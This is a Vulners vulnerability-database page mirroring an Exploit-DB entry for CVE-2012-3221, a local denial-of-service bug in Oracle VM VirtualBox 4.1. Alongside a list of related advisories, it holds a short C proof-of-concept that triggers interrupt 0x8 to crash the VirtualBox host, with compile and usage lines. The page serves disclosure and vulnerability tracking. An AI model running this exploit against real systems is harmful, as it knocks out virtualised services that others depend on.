Lucene search
+L

Oracle VM VirtualBox 4.1 - Local Denial of Service

🗓️ 10 Sep 2012 00:00:00Reported by halfdogType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Oracle VM VirtualBox 4.1 Local Denial of Service vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2012-3221
17 Oct 201210:00
cve
Cvelist
CVE-2012-3221
17 Oct 201210:00
cvelist
Debian
[SECURITY] [DSA 2594-1] virtualbox-ose security update
30 Dec 201213:16
debian
Debian CVE
CVE-2012-3221
17 Oct 201210:00
debiancve
Tenable Nessus
Debian DSA-2594-1 : virtualbox-ose - programming error
31 Dec 201200:00
nessus
Tenable Nessus
GLSA-201401-13 : VirtualBox: Multiple Vulnerabilities
21 Jan 201400:00
nessus
Tenable Nessus
Oracle VirtualBox 4.1 < 4.1.22 Task-Gate IDT Call NULL Pointer Dereference Local DoS
14 Sep 201200:00
nessus
EUVD
EUVD-2012-3199
7 Oct 202500:30
euvd
Gentoo Linux
VirtualBox: Multiple Vulnerabilities
20 Jan 201400:00
gentoo
NVD
CVE-2012-3221
17 Oct 201210:54
nvd
Rows per page
/*
source: https://www.securityfocus.com/bid/55471/info

Oracle VM VirtualBox is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause denial-of-service conditions.
*/

/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2012 halfdog <me (%) halfdog.net>
 *
 *  Compile: gcc -o RtcInt RtcInt.c
 *  Usage: ./RtcInt
 */
int main(int argc, char **argv) {
  asm (
    "int $0x8;"
    : // output: none
    : // input: none
    :"%eax", "%ebx", "%ecx", "%edx"   // clobbered register
  );
  return(0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Nov 2017 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 22.1
EPSS0.00791
30